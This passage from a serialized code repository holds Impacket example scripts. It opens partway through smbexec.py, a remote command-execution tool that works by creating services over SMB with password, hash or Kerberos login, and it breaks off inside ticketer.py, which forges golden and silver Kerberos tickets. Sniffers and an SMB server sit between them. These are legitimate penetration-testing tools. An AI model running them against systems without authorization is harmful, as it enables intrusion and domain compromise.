self.transferClient.deleteFile(self.__share, OUTPUT_FILENAME)\n except:\n pass\n \n # Just in case the service is still created\n try:\n self.__scmr = self.__rpc.get_dce_rpc()\n self.__scmr.connect()\n self.__scmr.bind(scmr.MSRPC_UUID_SCMR)\n resp = scmr.hROpenSCManagerW(self.__scmr)\n self.__scHandle = resp['lpScHandle']\n resp = scmr.hROpenServiceW(self.__scmr, self.__scHandle, self.__serviceName)\n service = resp['lpServiceHandle']\n scmr.hRDeleteService(self.__scmr, service)\n scmr.hRControlService(self.__scmr, service, scmr.SERVICE_CONTROL_STOP)\n scmr.hRCloseServiceHandle(self.__scmr, service)\n except scmr.DCERPCException:\n pass\n\n def do_shell(self, s):\n os.system(s)\n\n def do_exit(self, s):\n return True\n\n def do_EOF(self, s):\n print()\n return self.do_exit(s)\n\n def emptyline(self):\n return False\n\n def do_cd(self, s):\n # We just can't CD or maintain track of the target dir.\n if len(s) > 0:\n logging.error(\"You can't CD under SMBEXEC. Use full paths.\")\n\n self.execute_remote('cd ' )\n if len(self.__outputBuffer) > 0:\n # Stripping CR/LF\n self.prompt = self.__outputBuffer.decode().replace('\\r\\n','') + '>'\n if self.__shell_type == 'powershell':\n self.prompt = 'PS ' + self.prompt + ' '\n self.__outputBuffer = b''\n\n def do_CD(self, s):\n return self.do_cd(s)\n\n def default(self, line):\n if line != '':\n self.send_data(line)\n\n def get_output(self):\n def output_callback(data):\n self.__outputBuffer += data\n\n if self.__mode == 'SHARE':\n self.transferClient.getFile(self.__share, OUTPUT_FILENAME, output_callback)\n self.transferClient.deleteFile(self.__share, OUTPUT_FILENAME)\n else:\n fd = open(SMBSERVER_DIR + '/' + OUTPUT_FILENAME,'rb')\n output_callback(fd.read())\n fd.close()\n os.unlink(SMBSERVER_DIR + '/' + OUTPUT_FILENAME)\n\n def execute_remote(self, data, shell_type='cmd'):\n if shell_type == 'powershell':\n data = '$ProgressPreference=\"SilentlyContinue\";' + data\n data = self.__pwsh + b64encode(data.encode('utf-16le')).decode()\n\n batchFile = '%SYSTEMROOT%\\\\' + ''.join([random.choice(string.ascii_letters) for _ in range(8)]) + '.bat'\n \n command = self.__shell + 'echo ' + data + ' ^> ' + self.__output + ' 2^>^&1 > ' + batchFile + ' & ' + \\\n self.__shell + batchFile\n\n if self.__mode == 'SERVER':\n command += ' & ' + self.__copyBack\n command += ' & ' + 'del ' + batchFile\n\n logging.debug('Executing %s' % command)\n resp = scmr.hRCreateServiceW(self.__scmr, self.__scHandle, self.__serviceName, self.__serviceName,\n lpBinaryPathName=command, dwStartType=scmr.SERVICE_DEMAND_START)\n service = resp['lpServiceHandle']\n\n try:\n scmr.hRStartServiceW(self.__scmr, service)\n except:\n pass\n scmr.hRDeleteService(self.__scmr, service)\n scmr.hRCloseServiceHandle(self.__scmr, service)\n self.get_output()\n\n def send_data(self, data):\n self.execute_remote(data, self.__shell_type)\n try:\n print(self.__outputBuffer.decode(CODEC))\n except UnicodeDecodeError:\n logging.error('Decoding error detected, consider running chcp.com at the target,\\nmap the result with '\n 'https://docs.python.org/3/library/codecs.html#standard-encodings\\nand then execute smbexec.py '\n 'again with -codec and the corresponding codec')\n print(self.__outputBuffer.decode(CODEC, errors='replace'))\n self.__outputBuffer = b''\n\n\n# Process command-line arguments.\nif __name__ == '__main__':\n print(version.BANNER)\n\n parser = argparse.ArgumentParser()\n\n parser.add_argument('target', action='store', help='[[domain/]username[:password]@]')\n parser.add_argument('-share', action='store', default = 'C$', help='share where the output will be grabbed from '\n '(default C$)')\n parser.add_argument('-mode', action='store', choices = {'SERVER','SHARE'}, default='SHARE',\n help='mode to use (default SHARE, SERVER needs root!)')\n parser.add_argument('-ts', action='store_true', help='adds timestamp to every logging output')\n parser.add_argument('-debug', action='store_true', help='Turn DEBUG output ON')\n parser.add_argument('-codec', action='store', help='Sets encoding used (codec) from the target\\'s output (default '\n '\"%s\"). If errors are detected, run chcp.com at the target, '\n 'map the result with '\n 'https://docs.python.org/3/library/codecs.html#standard-encodings and then execute smbexec.py '\n 'again with -codec and the corresponding codec ' % CODEC)\n parser.add_argument('-shell-type', action='store', default = 'cmd', choices = ['cmd', 'powershell'], help='choose '\n 'a command processor for the semi-interactive shell')\n\n group = parser.add_argument_group('connection')\n\n group.add_argument('-dc-ip', action='store',metavar = \"ip address\", help='IP Address of the domain controller. '\n 'If omitted it will use the domain part (FQDN) specified in the target parameter')\n group.add_argument('-target-ip', action='store', metavar=\"ip address\", help='IP Address of the target machine. If '\n 'ommited it will use whatever was specified as target. This is useful when target is the NetBIOS '\n 'name and you cannot resolve it')\n group.add_argument('-port', choices=['139', '445'], nargs='?', default='445', metavar=\"destination port\",\n help='Destination port to connect to SMB Server')\n group.add_argument('-service-name', action='store', metavar=\"service_name\", help='The name of the'\n 'service used to trigger the payload')\n\n group = parser.add_argument_group('authentication')\n\n group.add_argument('-hashes', action=\"store\", metavar = \"LMHASH:NTHASH\", help='NTLM hashes, format is LMHASH:NTHASH')\n group.add_argument('-no-pass', action=\"store_true\", help='don\\'t ask for password (useful for -k)')\n group.add_argument('-k', action=\"store_true\", help='Use Kerberos authentication. Grabs credentials from ccache file '\n '(KRB5CCNAME) based on target parameters. If valid credentials cannot be found, it will use the '\n 'ones specified in the command line')\n group.add_argument('-aesKey', action=\"store\", metavar = \"hex key\", help='AES key to use for Kerberos Authentication '\n '(128 or 256 bits)')\n group.add_argument('-keytab', action=\"store\", help='Read keys for SPN from keytab file')\n\n\n if len(sys.argv)==1:\n parser.print_help()\n sys.exit(1)\n\n options = parser.parse_args()\n\n # Init the example's logger theme\n logger.init(options.ts, options.debug)\n\n if options.codec is not None:\n CODEC = options.codec\n else:\n if CODEC is None:\n CODEC = 'utf-8'\n\n domain, username, password, remoteName = parse_target(options.target)\n\n if domain is None:\n domain = ''\n\n if options.keytab is not None:\n Keytab.loadKeysFromKeytab (options.keytab, username, domain, options)\n options.k = True\n\n if password == '' and username != '' and options.hashes is None and options.no_pass is False and options.aesKey is None:\n from getpass import getpass\n password = getpass(\"Password:\")\n\n if options.target_ip is None:\n options.target_ip = remoteName\n\n if options.aesKey is not None:\n options.k = True\n\n try:\n executer = CMDEXEC(username, password, domain, options.hashes, options.aesKey, options.k, options.dc_ip,\n options.mode, options.share, int(options.port), options.service_name, options.shell_type)\n executer.run(remoteName, options.target_ip)\n except Exception as e:\n if logging.getLogger().level == logging.DEBUG:\n import traceback\n traceback.print_exc()\n logging.critical(str(e))\n sys.exit(0)\n" }, { "path": "examples/smbserver.py", "content": "#!/usr/bin/env python\n# Impacket - Collection of Python classes for working with network protocols.\n#\n# Copyright Fortra, LLC and its affiliated companies\n#\n# All rights reserved.\n#\n# This software is provided under a slightly modified version\n# of the Apache Software License. See the accompanying LICENSE file\n# for more information.\n#\n# Description:\n# Simple SMB Server example.\n#\n# Author:\n# Alberto Solino (@agsolino)\n#\n\nimport sys\nimport argparse\nimport logging\n\nfrom impacket.examples import logger\nfrom impacket import smbserver, version\nfrom impacket.ntlm import compute_lmhash, compute_nthash\n\nif __name__ == '__main__':\n\n # Init the example's logger theme\n print(version.BANNER)\n\n parser = argparse.ArgumentParser(add_help = True, description = \"This script will launch a SMB Server and add a \"\n \"share specified as an argument. Usually, you need to be root in order to bind to port 445. \"\n \"For optional authentication, it is possible to specify username and password or the NTLM hash. \"\n \"Example: smbserver.py -comment 'My share' TMP /tmp\")\n\n parser.add_argument('shareName', action='store', help='name of the share to add')\n parser.add_argument('sharePath', action='store', help='path of the share to add')\n parser.add_argument('-comment', action='store', help='share\\'s comment to display when asked for shares')\n parser.add_argument('-username', action=\"store\", help='Username to authenticate clients')\n parser.add_argument('-password', action=\"store\", help='Password for the Username')\n parser.add_argument('-computeraccountname', action=\"store\", help='computer account name to authenticate arbitrary clients with signing via NetLogon/Kerberos')\n parser.add_argument('-computeraccounthash', action=\"store\", help='computer account NT hash to authenticate arbitrary clients with signing via NetLogon/Kerberos')\n parser.add_argument('-computeraccountaes', action=\"store\", help='computer account AES key to authenticate arbitrary clients with signing via NetLogon/Kerberos')\n parser.add_argument('-computeraccountpassword', action=\"store\", help='computer account NT hash to authenticate arbitrary clients with signing via NetLogon/Kerberos')\n parser.add_argument('-computeraccountdomain', action=\"store\", help='computer account domain to authenticate arbitrary clients with signing via NetLogon/Kerberos')\n parser.add_argument('-dc-ip', action=\"store\", help='IP of domain controller to authenticate arbitrary clients with signing via NetLogon/Kerberos')\n parser.add_argument('-hashes', action=\"store\", metavar = \"LMHASH:NTHASH\", help='NTLM hashes for the Username, format is LMHASH:NTHASH')\n parser.add_argument('-ts', action='store_true', help='Adds timestamp to every logging output')\n parser.add_argument('-debug', action='store_true', help='Turn DEBUG output ON')\n parser.add_argument('-ip', '--interface-address', action='store', default=argparse.SUPPRESS, help='ip address of listening interface (\"0.0.0.0\" or \"::\" if omitted)')\n parser.add_argument('-readonly', action='store_true', help='Only allow reading of files')\n parser.add_argument('-disablekerberos', action='store_true', help='Do not offer Kerberos authentication')\n parser.add_argument('-disablentlm', action='store_true', help='Do not offer NTLM authentication')\n parser.add_argument('-port', action='store', default='445', help='TCP port for listening incoming connections (default 445)')\n parser.add_argument('-dropssp', action='store_true', default=False, help='Disable NTLM ESS/SSP during negotiation')\n parser.add_argument('-6','--ipv6', action='store_true',help='Listen on IPv6')\n parser.add_argument('-smb2support', action='store_true', default=False, help='SMB2 Support (experimental!)')\n parser.add_argument('-outputfile', action='store', default=None, help='Output file to log smbserver output messages')\n\n if len(sys.argv)==1:\n parser.print_help()\n sys.exit(1)\n\n try:\n options = parser.parse_args()\n except Exception as e:\n logging.critical(str(e))\n sys.exit(1)\n\n logger.init(options.ts, options.debug)\n\n if options.comment is None:\n comment = ''\n else:\n comment = options.comment\n\n if 'interface_address' not in options:\n options.interface_address = '::' if options.ipv6 else '0.0.0.0'\n\n server = smbserver.SimpleSMBServer(listenAddress=options.interface_address, listenPort=int(options.port), ipv6=options.ipv6)\n\n if options.outputfile:\n logging.info('Switching output to file %s' % options.outputfile)\n server.setLogFile(options.outputfile)\n\n server.addShare(options.shareName.upper(), options.sharePath, comment, readOnly=\"yes\" if options.readonly else \"no\")\n server.setSMB2Support(options.smb2support)\n server.setDropSSP(options.dropssp)\n server.setKerberosSupport(not options.disablekerberos)\n server.setNTLMSupport(not options.disablentlm)\n\n # If a user was specified, let's add it to the credentials for the SMBServer. If no user is specified, anonymous\n # connections will be allowed\n if options.username is not None:\n # we either need a password or hashes, if not, ask\n if options.password is None and options.hashes is None:\n from getpass import getpass\n password = getpass(\"Password:\")\n # Let's convert to hashes\n lmhash = compute_lmhash(password)\n nthash = compute_nthash(password)\n elif options.password is not None:\n lmhash = compute_lmhash(options.password)\n nthash = compute_nthash(options.password)\n else:\n lmhash, nthash = options.hashes.split(':')\n\n server.addCredential(options.username, 0, lmhash, nthash)\n\n # If we want clients to be able to connect to us which enforce signing, we need a computer account to properly setup the connection\n # Only works with SMB2\n required_secure_server_options = [options.computeraccountname, options.computeraccountdomain, options.dc_ip]\n at_least_one_secure_server_options = [options.computeraccounthash, options.computeraccountaes, options.computeraccountpassword]\n if any(required_secure_server_options):\n if options.username:\n logging.critical(\"You cannot use account credentials AND computer account credentials at the same time\")\n sys.exit(1)\n if not all(required_secure_server_options):\n logging.critical(\"All of the following options need to be set for accepting signed connections from arbitrary users in the domain: -computeraccountname, -computeraccountdomain, -dc-ip\")\n sys.exit(1)\n if not any(at_least_one_secure_server_options):\n logging.critical(\"At least one of the following options need to be set for accepting signed connections from arbitrary users in the domain: -computeraccounthash, -computeraccountaes, -computeraccountpassword\")\n sys.exit(1)\n server.setComputerAccount(options.computeraccountname, options.computeraccounthash, options.computeraccountaes, options.computeraccountpassword, options.computeraccountdomain, options.dc_ip)\n\n # Here you can set a custom SMB challenge in hex format\n # If empty defaults to '4141414141414141'\n # (remember: must be 16 hex bytes long)\n # e.g. server.setSMBChallenge('12345678abcdef00')\n server.setSMBChallenge('')\n\n # Rock and roll\n try:\n server.start()\n except KeyboardInterrupt:\n print(\"\\nInterrupted, exiting...\")\n sys.exit(130)\n" }, { "path": "examples/sniff.py", "content": "#!/usr/bin/env python\n# Impacket - Collection of Python classes for working with network protocols.\n#\n# Copyright Fortra, LLC and its affiliated companies \n#\n# All rights reserved.\n#\n# This software is provided under a slightly modified version\n# of the Apache Software License. See the accompanying LICENSE file\n# for more information.\n#\n# Description:\n# Simple packet sniffer.\n#\n# This packet sniffer uses the pcap library to listen for packets in\n# transit over the specified interface. The returned packages can be\n# filtered according to a BPF filter (see tcpdump(3) for further\n# information on BPF filters).\n#\n# Note that the user might need special permissions to be able to use pcap.\n#\n# Authors:\n# Maximiliano Caceres\n# Javier Kohen\n#\n# Reference for:\n# pcapy: findalldevs, open_live\n# ImpactDecoder\n#\n\nimport sys\nfrom threading import Thread\nimport pcapy\nfrom pcapy import findalldevs, open_live\nfrom impacket import version\n\nfrom impacket.ImpactDecoder import EthDecoder, LinuxSLLDecoder\n\n\nclass DecoderThread(Thread):\n def __init__(self, pcapObj):\n # Query the type of the link and instantiate a decoder accordingly.\n datalink = pcapObj.datalink()\n if pcapy.DLT_EN10MB == datalink:\n self.decoder = EthDecoder()\n elif pcapy.DLT_LINUX_SLL == datalink:\n self.decoder = LinuxSLLDecoder()\n else:\n raise Exception(\"Datalink type not supported: \" % datalink)\n\n self.pcap = pcapObj\n Thread.__init__(self)\n\n def run(self):\n # Sniff ad infinitum.\n # PacketHandler shall be invoked by pcap for every packet.\n self.pcap.loop(0, self.packetHandler)\n\n def packetHandler(self, hdr, data):\n # Use the ImpactDecoder to turn the rawpacket into a hierarchy\n # of ImpactPacket instances.\n # Display the packet in human-readable form.\n print(self.decoder.decode(data))\n\n\ndef getInterface():\n # Grab a list of interfaces that pcap is able to listen on.\n # The current user will be able to listen from all returned interfaces,\n # using open_live to open them.\n ifs = findalldevs()\n\n # No interfaces available, abort.\n if 0 == len(ifs):\n print(\"You don't have enough permissions to open any interface on this system.\")\n sys.exit(1)\n\n # Only one interface available, use it.\n elif 1 == len(ifs):\n print('Only one interface present, defaulting to it.')\n return ifs[0]\n\n # Ask the user to choose an interface from the list.\n count = 0\n for iface in ifs:\n print('%i - %s' % (count, iface))\n count += 1\n idx = int(input('Please select an interface: '))\n\n return ifs[idx]\n\ndef main(filter):\n print(version.DEPRECATION_WARNING_BANNER)\n dev = getInterface()\n\n # Open interface for catpuring.\n p = open_live(dev, 1500, 0, 100)\n\n # Set the BPF filter. See tcpdump(3).\n p.setfilter(filter)\n\n print(\"Listening on %s: net=%s, mask=%s, linktype=%d\" % (dev, p.getnet(), p.getmask(), p.datalink()))\n\n # Start sniffing thread and finish main thread.\n DecoderThread(p).start()\n\n# Process command-line arguments. Take everything as a BPF filter to pass\n# onto pcap. Default to the empty filter (match all).\nfilter = ''\nif len(sys.argv) > 1:\n filter = ' '.join(sys.argv[1:])\n\nmain(filter)\n" }, { "path": "examples/sniffer.py", "content": "#!/usr/bin/env python\n# Impacket - Collection of Python classes for working with network protocols.\n#\n# Copyright Fortra, LLC and its affiliated companies \n#\n# All rights reserved.\n#\n# This software is provided under a slightly modified version\n# of the Apache Software License. See the accompanying LICENSE file\n# for more information.\n#\n# Description:\n# Simple packet sniffer.\n#\n# This packet sniffer uses a raw socket to listen for packets\n# in transit corresponding to the specified protocols.\n#\n# Note that the user might need special permissions to be able to use\n# raw sockets.\n#\n# Authors:\n# Gerardo Richarte (@gerasdf)\n# Javier Kohen\n#\n# Reference for:\n# ImpactDecoder\n#\n\nfrom select import select\nimport socket\nimport sys\n\nfrom impacket import ImpactDecoder\n\nDEFAULT_PROTOCOLS = ('icmp', 'tcp', 'udp')\n\nif len(sys.argv) == 1:\n toListen = DEFAULT_PROTOCOLS\n print(\"Using default set of protocols. A list of protocols can be supplied from the command line, eg.: %s [proto2] ...\" % sys.argv[0])\nelse:\n toListen = sys.argv[1:]\n\n# Open one socket for each specified protocol.\n# A special option is set on the socket so that IP headers are included with\n# the returned data.\nsockets = []\nfor protocol in toListen:\n try:\n protocol_num = socket.getprotobyname(protocol)\n except socket.error:\n print(\"Ignoring unknown protocol:\", protocol)\n toListen.remove(protocol)\n continue\n s = socket.socket(socket.AF_INET, socket.SOCK_RAW, protocol_num)\n s.setsockopt(socket.IPPROTO_IP, socket.IP_HDRINCL, 1)\n sockets.append(s)\n\nif 0 == len(toListen):\n print(\"There are no protocols available.\")\n sys.exit(0)\n\nprint(\"Listening on protocols:\", toListen)\n\n# Instantiate an IP packets decoder.\n# As all the packets include their IP header, that decoder only is enough.\ndecoder = ImpactDecoder.IPDecoder()\n\nwhile len(sockets) > 0:\n # Wait for an incoming packet on any socket.\n ready = select(sockets, [], [])[0]\n for s in ready:\n packet = s.recvfrom(4096)[0]\n if 0 == len(packet):\n # Socket remotely closed. Discard it.\n sockets.remove(s)\n s.close()\n else:\n # Packet received. Decode and display it.\n packet = decoder.decode(packet)\n print(packet)\n" }, { "path": "examples/split.py", "content": "#!/usr/bin/env python\n# Impacket - Collection of Python classes for working with network protocols.\n#\n# Copyright Fortra, LLC and its affiliated companies \n#\n# All rights reserved.\n#\n# This software is provided under a slightly modified version\n# of the Apache Software License. See the accompanying LICENSE file\n# for more information.\n#\n# Description:\n# Pcap dump splitter\n#\n# This tools splits pcap capture files into smaller ones, one for each\n# different TCP/IP connection found in the original.\n#\n# Authors:\n# Alejandro D. Weil\n# Javier Kohen\n#\n# Reference for:\n# pcapy: open_offline, pcapdumper\n# ImpactDecoder\n#\n\nfrom __future__ import division\nfrom __future__ import print_function\nimport sys\nimport pcapy\nfrom pcapy import open_offline\nfrom impacket import version\n\nfrom impacket.ImpactDecoder import EthDecoder, LinuxSLLDecoder\n\n\nclass Connection:\n \"\"\"This class can be used as a key in a dictionary to select a connection\n given a pair of peers. Two connections are considered the same if both\n peers are equal, despite the order in which they were passed to the\n class constructor.\n \"\"\"\n\n def __init__(self, p1, p2):\n \"\"\"This constructor takes two tuples, one for each peer. The first\n element in each tuple is the IP address as a string, and the\n second is the port as an integer.\n \"\"\"\n\n self.p1 = p1\n self.p2 = p2\n\n def getFilename(self):\n \"\"\"Utility function that returns a filename composed by the IP\n addresses and ports of both peers.\n \"\"\"\n return '%s.%d-%s.%d.pcap'%(self.p1[0],self.p1[1],self.p2[0],self.p2[1])\n\n def __cmp__(self, other):\n if ((self.p1 == other.p1 and self.p2 == other.p2)\n or (self.p1 == other.p2 and self.p2 == other.p1)):\n return 0\n else:\n return -1\n\n def __hash__(self):\n return (hash(self.p1[0]) ^ hash(self.p1[1])\n ^ hash(self.p2[0]) ^ hash(self.p2[1]))\n\n\nclass Decoder:\n def __init__(self, pcapObj):\n # Query the type of the link and instantiate a decoder accordingly.\n datalink = pcapObj.datalink()\n if pcapy.DLT_EN10MB == datalink:\n self.decoder = EthDecoder()\n elif pcapy.DLT_LINUX_SLL == datalink:\n self.decoder = LinuxSLLDecoder()\n else:\n raise Exception(\"Datalink type not supported: \" % datalink)\n\n self.pcap = pcapObj\n self.connections = {}\n\n def start(self):\n # Sniff ad infinitum.\n # PacketHandler shall be invoked by pcap for every packet.\n self.pcap.loop(0, self.packetHandler)\n\n def packetHandler(self, hdr, data):\n \"\"\"Handles an incoming pcap packet. This method only knows how\n to recognize TCP/IP connections.\n Be sure that only TCP packets are passed onto this handler (or\n fix the code to ignore the others).\n\n Setting r\"ip proto \\tcp\" as part of the pcap filter expression\n suffices, and there shouldn't be any problem combining that with\n other expressions.\n \"\"\"\n\n # Use the ImpactDecoder to turn the rawpacket into a hierarchy\n # of ImpactPacket instances.\n p = self.decoder.decode(data)\n ip = p.child()\n tcp = ip.child()\n\n # Build a distinctive key for this pair of peers.\n src = (ip.get_ip_src(), tcp.get_th_sport() )\n dst = (ip.get_ip_dst(), tcp.get_th_dport() )\n con = Connection(src,dst)\n\n # If there isn't an entry associated yetwith this connection,\n # open a new pcapdumper and create an association.\n if ('%s%s' % (con.p1, con.p2)) not in self.connections:\n fn = con.getFilename()\n print(\"Found a new connection, storing into:\", fn)\n try:\n dumper = self.pcap.dump_open(fn)\n except pcapy.PcapError:\n print(\"Can't write packet to:\", fn)\n return\n self.connections['%s%s' % (con.p1, con.p2)] = dumper\n\n # Write the packet to the corresponding file.\n self.connections['%s%s' % (con.p1, con.p2)].dump(hdr, data)\n\n\n\ndef main(filename):\n # Open file\n p = open_offline(filename)\n\n # At the moment the callback only accepts TCP/IP packets.\n p.setfilter(r'ip proto \\tcp')\n\n print(\"Reading from %s: linktype=%d\" % (filename, p.datalink()))\n\n # Start decoding process.\n Decoder(p).start()\n\n\n# Process command-line arguments.\nif __name__ == '__main__':\n print(version.DEPRECATION_WARNING_BANNER)\n if len(sys.argv) <= 1:\n print(\"Usage: %s \" % sys.argv[0])\n sys.exit(1)\n\n main(sys.argv[1])\n" }, { "path": "examples/ticketConverter.py", "content": "#!/usr/bin/env python\n# Impacket - Collection of Python classes for working with network protocols.\n#\n# Copyright Fortra, LLC and its affiliated companies \n#\n# All rights reserved.\n#\n# This software is provided under a slightly modified version\n# of the Apache Software License. See the accompanying LICENSE file\n# for more information.\n#\n# Description:\n# This script will convert kirbi files (commonly used by mimikatz) into ccache files used by impacket,\n# and vice versa.\n#\n# Examples:\n# ./ticket_converter.py admin.ccache admin.kirbi\n# ./ticket_converter.py admin.kirbi admin.ccache\n#\n# Author:\n# Zer1t0 (https://github.com/Zer1t0)\n#\n# References:\n# - https://tools.ietf.org/html/rfc4120\n# - http://web.mit.edu/KERBEROS/krb5-devel/doc/formats/ccache_file_format.html\n# - https://github.com/gentilkiwi/kekeo\n# - https://github.com/rvazarkar/KrbCredExport\n#\n\nimport os\nimport argparse\nimport base64\nimport struct\nimport tempfile\n\nfrom impacket import version\nfrom impacket.krb5.ccache import CCache\n\n\ndef parse_args():\n parser = argparse.ArgumentParser()\n parser.add_argument('input_file', help=\"File in kirbi (KRB-CRED) or ccache format\")\n parser.add_argument('output_file', help=\"Output file\")\n parser.add_argument(\n '-b', '--base64', action='store_true', help=\"Decode input ticket from base64 with unwrap support\"\n )\n return parser.parse_args()\n\n\ndef main():\n print(version.BANNER)\n\n args = parse_args()\n\n if args.base64:\n decoded_file = tempfile.NamedTemporaryFile(mode='w+b', delete=False)\n print('[*] base64 decoding ticket')\n decoded_file.write(base64_decode_with_unwrap(args.input_file))\n decoded_file.flush()\n \n input_file = decoded_file.name if args.base64 else args.input_file\n\n if is_kirbi_file(input_file):\n print('[*] converting kirbi to ccache...')\n convert_kirbi_to_ccache(input_file, args.output_file)\n print('[+] done')\n elif is_ccache_file(input_file):\n print('[*] converting ccache to kirbi...')\n convert_ccache_to_kirbi(input_file, args.output_file)\n print('[+] done')\n else:\n print('[X] unknown file format')\n \n # Cleanup manually to avoid issues with Windows delete permissions\n if args.base64:\n try:\n decoded_file.close()\n os.unlink(decoded_file.name)\n except PermissionError:\n print('[!] Failed to clean temporary files due to PermissionError')\n\n\ndef is_kirbi_file(filename):\n with open(filename, 'rb') as fi:\n fileid = struct.unpack(\">B\", fi.read(1))[0]\n return fileid == 0x76\n\n\ndef is_ccache_file(filename):\n with open(filename, 'rb') as fi:\n fileid = struct.unpack(\">B\", fi.read(1))[0]\n return fileid == 0x5\n\n\ndef convert_kirbi_to_ccache(input_filename, output_filename):\n ccache = CCache.loadKirbiFile(input_filename)\n ccache.saveFile(output_filename)\n\n\ndef convert_ccache_to_kirbi(input_filename, output_filename):\n ccache = CCache.loadFile(input_filename)\n ccache.saveKirbiFile(output_filename)\n\n\ndef base64_decode_with_unwrap(input_filename):\n with open(input_filename, 'r', encoding='latin-1') as f:\n data = ''.join(f.read().strip().splitlines())\n data = base64.b64decode(data.encode('latin-1'))\n\n return data\n\nif __name__ == '__main__':\n main()\n" }, { "path": "examples/ticketer.py", "content": "#!/usr/bin/env python\n# Impacket - Collection of Python classes for working with network protocols.\n#\n# Copyright Fortra, LLC and its affiliated companies \n#\n# All rights reserved.\n#\n# This software is provided under a slightly modified version\n# of the Apache Software License. See the accompanying LICENSE file\n# for more information.\n#\n# Description:\n# This script will create TGT/TGS tickets from scratch or based on a template (legally requested from the KDC)\n# allowing you to customize some of the parameters set inside the PAC_LOGON_INFO structure, in particular the\n# groups, extrasids, etc.\n# Tickets duration is fixed to 10 years from now (although you can manually change it)\n#\n# Examples:\n# ./ticketer.py -nthash -domain-sid -domain baduser\n#\n# will create and save a golden ticket for user 'baduser' that will be all encrypted/signed used RC4.\n# If you specify -aesKey instead of -ntHash everything will be encrypted using AES128 or AES256\n# (depending on the key specified). No traffic is generated against the KDC. Ticket will be saved as\n# baduser.ccache.\n#\n# ./ticketer.py -nthash -aesKey -domain-sid -domain \n# -request -user -password baduser\n#\n# will first authenticate against the KDC (using -user/-password) and get a TGT that will be used\n# as template for customization. Whatever encryption algorithms used on that ticket will be honored,\n# hence you might need to specify both -nthash and -aesKey data. Ticket will be generated for 'baduser' and saved\n# as baduser.ccache.\n#\n# Author:\n# Alberto Solino (@agsolino)\n#\n# References:\n# - Original presentation at BlackHat USA 2014 by @gentilkiwi and @passingthehash:\n# (https://www.slideshare.net/gentilkiwi/abusing-microsoft-kerberos-sorry-you-guys-dont-get-it)\n# - Original implementation by Benjamin Delpy (@gentilkiwi) in mimikatz\n# (https://github.com/gentilkiwi/mimikatz)\n#\n# ToDo:\n# [X] Silver tickets still not implemented - DONE by @machosec and fixes by @br4nsh\n# [ ] When -request is specified, we could ask for a user2user ticket and also populate the received PAC\n#\n\nfrom __future__ import division\nfrom __future__ import print_function\nimport argparse\nimport datetime\nimport logging\nimport random\nimport string\nimport struct\nimport sys\nfrom calendar import timegm\nfrom time import strptime\nfrom binascii import unhexlify\nfrom six import b\n\nfrom pyasn1.codec.der import encoder, decoder\nfrom pyasn1.type.univ import noValue\n\nfrom impacket import version\nfrom impacket.dcerpc.v5.dtypes import RPC_SID, SID\nfrom impacket.dcerpc.v5.ndr import NDRULONG\nfrom impacket.dcerpc.v5.samr import NULL, GROUP_MEMBERSHIP, SE_GROUP_MANDATORY, SE_GROUP_ENABLED_BY_DEFAULT, \\\n SE_GROUP_ENABLED, USER_NORMAL_ACCOUNT, USER_DONT_EXPIRE_PASSWORD\nfrom impacket.examples import logger\nfrom impacket.krb5.asn1 import AS_REP, TGS_REP, ETYPE_INFO2, AuthorizationData, EncTicketPart, EncASRepPart, EncTGSRepPart, AD_IF_RELEVANT\nfrom impacket.krb5.constants import ApplicationTagNumbers, PreAuthenticationDataTypes, EncryptionTypes, \\\n PrincipalNameType, ProtocolVersionNumber, TicketFlags, encodeFlags, ChecksumTypes, AuthorizationDataType, \\\n KERB_NON_KERB_CKSUM_SALT\nfrom impacket.krb5.keytab import Keytab\nfrom impacket.krb5.crypto import Key, _enctype_table\nfrom impacket.krb5.crypto import _checksum_table, Enctype\nfrom impacket.krb5.pac import KERB_SID_AND_ATTRIBUTES, PAC_SIGNATURE_DATA, PAC_INFO_BUFFER, PAC_LOGON_INFO, \\\n PAC_CLIENT_INFO_TYPE, PAC_SERVER_CHECKSUM, PAC_PRIVSVR_CHECKSUM, PACTYPE, PKERB_SID_AND_ATTRIBUTES_ARRAY, \\\n VALIDATION_INFO, PAC_CLIENT_INFO, KERB_VALIDATION_INFO, UPN_DNS_INFO_FULL, PAC_REQUESTOR_INFO, PAC_UPN_DNS_INFO, PAC_ATTRIBUTES_INFO, PAC_REQUESTOR, \\\n PAC_ATTRIBUTE_INFO\nfrom impacket.krb5.types import KerberosTime, Principal\nfrom impacket.krb5.kerberosv5 import getKerberosTGT, getKerberosTGS\n\nfrom impacket.krb5 import constants, pac\nfrom impacket.krb5.asn1 import AP_REQ, TGS_REQ, Authenticator, seq_set, seq_set_iter, PA_FOR_USER_ENC, Ticket as TicketAsn1\nfrom impacket.krb5.crypto import _HMACMD5, _AES256CTS, string_to_key\nfrom impacket.krb5.kerberosv5 import sendReceive\nfrom impacket.krb5.types import Ticket\nfrom impacket.winregistry import hexdump\n\nclass TICKETER:\n def __init__(self, target, password, domain, options):\n self.__password = password\n self.__target = target\n self.__domain = domain\n self.__options = options\n self.__tgt = None\n self.__tgt_session_key = None\n if options.spn:\n spn = options.spn.split('/')\n self.__service = spn[0]\n self.__server = spn[1]\n if options.keytab is not None:\n self.loadKeysFromKeytab(options.keytab)\n\n # we are creating a golden ticket\n else:\n self.__service = 'krbtgt'\n self.__server = self.__domain\n\n @staticmethod\n def getFileTime(t):\n t *= 10000000\n t += 116444736000000000\n return t\n\n @staticmethod\n def getPadLength(data_length):\n return ((data_length + 7) // 8 * 8) - data_length\n\n @staticmethod\n def getBlockLength(data_length):\n return (data_length + 7) // 8 * 8\n\n def loadKeysFromKeytab(self, filename):\n keytab = Keytab.loadFile(filename)\n keyblock = keytab.getKey(\"%s@%s\" % (options.spn, self.__domain))\n if keyblock:\n if keyblock[\"keytype\"] == Enctype.AES256 or keyblock[\"keytype\"] == Enctype.AES128:\n options.aesKey = keyblock.hexlifiedValue()\n elif keyblock[\"keytype\"] == Enctype.RC4:\n options.nthash = keyblock.hexlifiedValue()\n else:\n logging.warning(\"No matching key for SPN '%s' in given keytab found!\", options.spn)\n\n def createBasicValidationInfo(self):\n # 1) KERB_VALIDATION_INFO\n kerbdata = KERB_VALIDATION_INFO()\n\n aTime = timegm(datetime.datetime.now(datetime.timezone.utc).timetuple())\n unixTime = self.getFileTime(aTime)\n\n kerbdata['LogonTime']['dwLowDateTime'] = unixTime & 0xffffffff\n kerbdata['LogonTime']['dwHighDateTime'] = unixTime >> 32\n\n # LogoffTime: A FILETIME structure that contains the time the client's logon\n # session should expire. If the session should not expire, this structure\n # SHOULD have the dwHighDateTime member set to 0x7FFFFFFF and the dwLowDateTime\n # member set to 0xFFFFFFFF. A 